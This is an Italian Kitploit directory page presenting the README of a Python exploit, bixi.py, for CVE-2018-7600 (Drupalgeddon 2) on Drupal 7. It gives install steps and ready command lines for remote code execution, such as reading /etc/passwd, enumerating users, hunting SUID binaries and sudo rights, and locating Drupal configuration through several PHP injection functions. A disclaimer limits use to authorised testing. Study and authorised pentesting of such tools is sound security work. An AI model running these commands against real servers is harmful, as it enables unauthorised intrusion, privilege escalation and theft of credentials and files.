Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Drupalgeddon2-CVE-2018-7600 — Exploit Python per CVE-2018-7600 (Drupalgeddon 2) che consente l'esecuzione remota di codice su Drupal 7 con più metodi di iniezione e comandi predefiniti per Linux e Windows. | Kitploit
Strumenti/GitHubGitHub/bixipro/drupalgeddon2-cve-2018-7600
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingCommand and ControlApprendimento e Formazione
GitHubbixipro/drupalgeddon2-cve-2018-7600

Drupalgeddon2-CVE-2018-7600

Exploit Python per CVE-2018-7600 (Drupalgeddon 2) che consente l'esecuzione remota di codice su Drupal 7 con più metodi di iniezione e comandi predefiniti per Linux e Windows.

Vedi Repository
7 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

🔥 Drupalgeddon 2 Exploit — bixi.py

📖 Descrizione

bixi.py è un exploit per la vulnerabilità CVE‑2018‑7600 (Drupalgeddon 2) che colpisce Drupal 7. Permette l'esecuzione remota di comandi (RCE) su server Drupal vulnerabili tramite un'interfaccia intuitiva e comandi predefiniti.


⚠️ DISCLAIMER / AVVISO LEGALE

QUESTO SOFTWARE È SOLO A SCOPO EDUCATIVO E DI RICERCA IN AMBIENTI CONTROLLATI.

  • Utilizzare solo su sistemi di tua proprietà o per i quali hai autorizzazione scritta per test
  • L'uso non autorizzato è ILLEGALE e può comportare conseguenze penali
  • L'autore non si assume la responsabilità per l'uso improprio di questo strumento
  • Rispetta sempre le leggi locali e internazionali sulla cybersecurity

"With great power comes great responsibility"


📋 Caratteristiche

  • ✅ Sfruttamento automatico di CVE‑2018‑7600
  • ✅ Comandi predefiniti per Linux e Windows
  • ✅ Molteplici metodi di iniezione (, , , )
system
passthru
exec
shell_exec
  • ✅ Interfaccia intuitiva con sistema di aiuto
  • ✅ Gestione robusta di errori e timeout
  • ✅ Output formattato e facile da leggere

  • 🚀 Installazione Rapida

    1. Clonare il repository

    root@kitploit:~
    git clone https://github.com/bixiPRO/Drupalgeddon2-CVE-2018-7600.git
    cd Drupalgeddon2-CVE-2018-7600
    

    2. Installare le dipendenze

    root@kitploit:~
    # Kali / Debian / Ubuntu
    sudo apt update
    sudo apt install python3 python3-pip -y
    pip3 install requests
    
    # Altre distribuzioni
    pip3 install requests
    

    3. Dare permessi di esecuzione

    root@kitploit:~
    chmod +x bixi.py
    

    🎯 Utilizzo Base

    Visualizzare l'aiuto completo

    root@kitploit:~
    python3 bixi.py --help
    

    Sintassi generale

    root@kitploit:~
    python3 bixi.py <URL> <COMANDO/PAROLA_CHIAVE> [INJECTION_TYPE]
    

    Esempi pratici

    root@kitploit:~
    # Verificare vulnerabilità
    python3 bixi.py http://10.99.99.6/drupal/ test
    
    # Rilevare sistema operativo
    python3 bixi.py http://10.99.99.6/drupal/ linux
    python3 bixi.py http://10.99.99.6/drupal/ windows
    
    # Elencare utenti
    python3 bixi.py http://10.99.99.6/drupal/ users_linux
    python3 bixi.py http://10.99.99.6/drupal/ net_user
    
    # Informazioni di sistema
    python3 bixi.py http://10.99.99.6/drupal/ ifconfig
    python3 bixi.py http://10.99.99.6/drupal/ ipconfig
    
    # Comandi personalizzati
    python3 bixi.py http://10.99.99.6/drupal/ "cat /etc/passwd"
    python3 bixi.py http://10.99.99.6/drupal/ "whoami /all"
    

    📊 Parole Chiave Predefinite

    🐧 Linux

    ComandoDescrizione
    linuxInformazioni di sistema
    users_linuxElencare utenti
    idInfo utente/gruppi
    lsElencare file
    ifconfigInfo rete
    find_flagCercare flags

    🪟 Windows

    ComandoDescrizione
    windowsInformazioni di sistema
    net_userElencare utenti
    whoami_winInfo dettagliata
    ipconfigRete
    netstat_winConnessioni
    dirElencare directory

    🔧 Pentesting

    ComandoDescrizione
    sudoVerificare privilegi sudo
    suidCercare binari SUID
    net_localgroupGruppi locali
    drupal_configCercare configurazioni
    drupal_versionOttenere versione Drupal

    🎨 Metodi di Iniezione

    root@kitploit:~
    # system (default)
    python3 bixi.py http://target/ "whoami" system
    
    # passthru
    python3 bixi.py http://target/ "whoami" passthru
    
    # exec
    python3 bixi.py http://target/ "whoami" exec
    
    # shell_exec
    python3 bixi.py http://target/ "whoami" shell_exec
    

    🏗️ Struttura del Progetto

    root@kitploit:~
    drupalgeddon2-exploit/
    │
    ├── bixi.py
    ├── README.md
    ├── requirements.txt
    ├── examples/
    │   ├── linux_commands.txt
    │   └── windows_commands.txt
    └── screenshots/
        ├── help_screen.png
        └── exploit_success.png
    

    🔧 Configurazione Avanzata

    Proxy (opzionale)

    root@kitploit:~
    proxies = {
        'http': 'http://127.0.0.1:8080',
        'https': 'http://127.0.0.1:8080'
    }
    

    Timeout

    Modificare valore predefinito (15 secondi):

    root@kitploit:~
    timeout=15
    

    Aggiungere nuovi comandi

    Modificare il dizionario commands in get_command_for_keyword()


    🐛 Risoluzione dei Problemi

    Errore: No module named 'requests'

    root@kitploit:~
    pip3 install requests
    

    Errore: Connection refused

    root@kitploit:~
    # Verificar conectividad
    ping TARGET_IP
    
    # Verificar ruta Drupal
    curl http://TARGET_IP/drupal/
    
    Scarica lo strumento